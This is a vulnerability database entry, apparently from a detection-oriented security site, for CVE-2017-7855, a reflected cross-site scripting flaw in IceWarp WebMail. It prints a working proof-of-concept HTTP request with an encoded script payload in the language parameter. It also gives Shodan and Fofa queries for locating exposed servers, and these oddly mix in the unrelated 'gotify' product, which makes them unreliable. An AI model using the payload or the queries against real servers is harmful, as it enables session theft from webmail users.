🔙 목록으로 돌아가기

CVE-2017-7855: IceWarp WebMail 11.3.1.5 - Cross-Site Scripting

TitleIceWarp WebMail 11.3.1.5 - Cross-Site Scripting
Authorr3Y3r53
SeverityMedium
ImpactAttackers can execute arbitrary JavaScript in victims' browsers, potentially stealing session cookies, credentials, or performing actions on behalf of users.
RemediationApply the latest security patch or upgrade to a non-vulnerable version of IceWarp WebMail.
CVSS Score6.1
EPSS Score0.00545
CVE IDCVE-2017-7855
CWE IDCWE-79
Shodan Querytitle:"icewarp"http.title:"gotify"
Fofa Querytitle="gotify"
Tags cve cve2017 xss icewarp vuln

🔍 Vulnerability Description

IceWarp WebMail 11.3.1.5 is vulnerable to cross-site scripting via the language parameter.

🌐 HTTP Request

GET /webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-7855.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-7855.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A